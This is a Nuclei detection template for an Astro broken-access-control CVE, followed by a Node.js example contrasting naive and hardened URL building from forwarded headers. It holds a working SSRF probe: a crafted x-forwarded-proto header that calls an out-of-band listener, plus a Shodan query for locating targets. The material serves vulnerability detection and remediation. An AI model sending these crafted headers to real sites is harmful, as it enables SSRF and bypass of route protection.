Astro versions from 2.16.0 up to but not including 5.15.5 contain a broken access control issue caused by insecure use of the unsanitized x-forwarded-proto and x-forwarded-port request headers when building URLs. An attacker who sends crafted headers can bypass middleware protection and cause denial of service, SSRF, and URL pollution.
PoC code [public]
id: CVE-2025-64525

info:
  name: Astro - Broken Access Control
  author: zhero___,DhiyaneshDK
  severity: medium
  description: |
    Astro versions from 2.16.0 up to but not including 5.15.5 contain a broken access control issue caused by insecure use of the unsanitized x-forwarded-proto and x-forwarded-port request headers when building URLs. An attacker who sends crafted headers can bypass middleware protection and cause denial of service, SSRF, and URL pollution.
  impact: |
    Attackers can bypass route protection, cause denial of service, perform SSRF, and pollute URLs, leading to security bypasses and potential XSS.
  remediation: |
    Update to version 5.15.5 or later.
  reference:
    - https://github.com/advisories/GHSA-hr2q-hp5q-x767
    - https://zhero-web-sec.github.io/research-and-things/astro-framework-and-standards-weaponization
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"_astro"
  tags: cve,cve2025,astro,ssrf,oast,oob

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        x-forwarded-proto: http://{{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Astro-Middleware"
          - "User-Agent: node"
        condition: or
# digest: 4b0a00483046022100e0b21b0b15c9e23adc131fa3139ad516193ba851e191d6db1996966a60078898022100e546e0623d48152d7aa9b2f4a588e31cc1f731557623fe29d177517c90d7316e:922c64590222798bb761d5b6d8e72950
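As an added illustration, not Astro's source and not part of the template above, the following Node.js snippet shows the URL-building mistake the description refers to next to a hardened builder. buildUrlNaive splices the forwarded headers straight into a URL string, the way a server that trusts them blindly would; buildUrlSafe only honours x-forwarded-proto and x-forwarded-port when the application is explicitly configured as sitting behind a trusted proxy, and validates each value against a strict allowlist before the URL parser ever sees it. The host names victim.example and oast.example, the header values and the function names are all constructed for this example; oast.example stands in for the {{interactsh-url}} listener used by the template.

```javascript
// Added illustration (not Astro's code): how unsanitized x-forwarded-proto /
// x-forwarded-port headers end up controlling the host of a URL the server
// builds for itself, and how an allowlist-based builder closes that off.
// All header values and host names below are constructed for the example.
// Uses only the global WHATWG URL class, so it runs on any recent Node.js.

// Vulnerable pattern: forwarded headers are spliced into the URL string verbatim.
function buildUrlNaive(headers, path) {
  const proto = headers["x-forwarded-proto"] ?? "https";
  const port = headers["x-forwarded-port"];
  const host = headers["host"];
  return `${proto}://${host}${port ? `:${port}` : ""}${path}`;
}

// Hardened pattern: forwarded headers are honoured only behind a trusted proxy,
// and every value is checked against a strict allowlist first.
const ALLOWED_PROTOCOLS = new Set(["http", "https"]);
// Deliberately strict: hostname or IPv4 with optional port. Deployments that need
// IPv6 literals in Host would have to extend this.
const HOST_RE = /^[A-Za-z0-9.-]+(:\d{1,5})?$/;
const PORT_RE = /^\d{1,5}$/;

function buildUrlSafe(headers, path, { trustProxy = false } = {}) {
  const host = headers["host"];
  if (typeof host !== "string" || !HOST_RE.test(host)) {
    throw new Error("rejecting request: malformed Host header");
  }
  if (typeof path !== "string" || !path.startsWith("/")) {
    throw new Error("rejecting request: path must be absolute");
  }
  let proto = "https";
  let port = "";
  if (trustProxy) {
    const fwdProto = headers["x-forwarded-proto"];
    if (fwdProto !== undefined) {
      // Chained proxies may append values; only the first hop's value matters.
      const first = typeof fwdProto === "string" ? fwdProto.split(",")[0].trim().toLowerCase() : "";
      if (!ALLOWED_PROTOCOLS.has(first)) {
        throw new Error(`rejecting request: x-forwarded-proto ${JSON.stringify(fwdProto)} not in allowlist`);
      }
      proto = first;
    }
    const fwdPort = headers["x-forwarded-port"];
    if (fwdPort !== undefined) {
      const n = Number(fwdPort);
      if (typeof fwdPort !== "string" || !PORT_RE.test(fwdPort) || n < 1 || n > 65535) {
        throw new Error(`rejecting request: x-forwarded-port ${JSON.stringify(fwdPort)} is not a valid port`);
      }
      port = fwdPort;
    }
  }
  // Build through the parser, component by component, instead of by concatenation.
  const url = new URL(`${proto}://${host}`);
  if (port) url.port = port;
  url.pathname = path; // the setter keeps the authority fixed even for "//evil/"-style paths
  return url.href;
}

// Which host would a server-side fetch() of this URL actually reach?
function hostOf(urlString) {
  return new URL(urlString).hostname;
}

// Constructed requests mirroring the template's payload: oast.example stands in
// for the out-of-band listener, victim.example for the Astro site.
const craftedProto = { host: "victim.example", "x-forwarded-proto": "http://oast.example" };
const craftedPort = { host: "victim.example", "x-forwarded-port": "8080@oast.example" };
const benign = { host: "victim.example", "x-forwarded-proto": "http", "x-forwarded-port": "8080" };

function demo() {
  for (const h of [craftedProto, craftedPort]) {
    const naive = buildUrlNaive(h, "/");
    console.log(`naive: ${naive} -> host ${hostOf(naive)}`);
  }
  for (const h of [craftedProto, craftedPort, benign]) {
    try {
      console.log(`safe:  ${buildUrlSafe(h, "/", { trustProxy: true })}`);
    } catch (e) {
      console.log(`safe:  ${e.message}`);
    }
  }
}

demo();
```

Running it shows both crafted requests resolving to oast.example under the naive builder: `http://oast.example://victim.example/` parses with the attacker's value as the authority and the real host pushed into the path, and `https://victim.example:8080@oast.example/` turns the real host into userinfo. That is exactly the out-of-band hit the template's interactsh matcher waits for. The safe builder rejects both and, when trustProxy is off, ignores the forwarded headers entirely and returns `https://victim.example/`.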